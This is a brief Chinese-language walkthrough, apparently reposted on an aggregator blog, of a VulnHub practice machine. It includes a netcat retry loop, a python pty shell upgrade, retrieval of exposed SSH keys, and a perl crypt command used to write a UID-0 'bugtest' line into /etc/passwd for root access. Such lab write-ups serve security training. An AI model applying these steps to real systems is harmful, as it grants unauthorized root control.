vulnhub攻略
Posted xm17
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了vulnhub攻略相关的知识,希望对你有一定的参考价值。
这个靶机国内https://www.cnblogs.com/hack404/p/11423228.html这个大佬有做过
首先他的ip是192.168.2.120,这个很重要,自己配置一下环境,搞了半天ip都不同
有几个坑点,当用telnet链接10001端口时,会提示链接重置,然后看了国外小哥
使用while true; do nc -v 192.168.2.120 10001 && break;sleep 1;clear;done;命令,等一会,就自己打开了
他的ssh私钥文件直接就给,看了一下 进/media目录,ls -R可以看到,
然后用反弹没什么问题,然后用python开一个终端,
python -c "import pty; pty.spawn(‘/bin/bash‘);"
下载文件后,给id_ras权限,然后链接
最后往/etc/passwd添加用户的时候,他这个生成密码看不懂,我不会
perl -le ‘print crypt("10086","bb")‘ ,生成密码10086
bugtest:bbma0iajVxQUI:0:0:root:/root:/bin/bash
就可以登录了一般的难度
以上是关于vulnhub攻略的主要内容,如果未能解决你的问题,请参考以下文章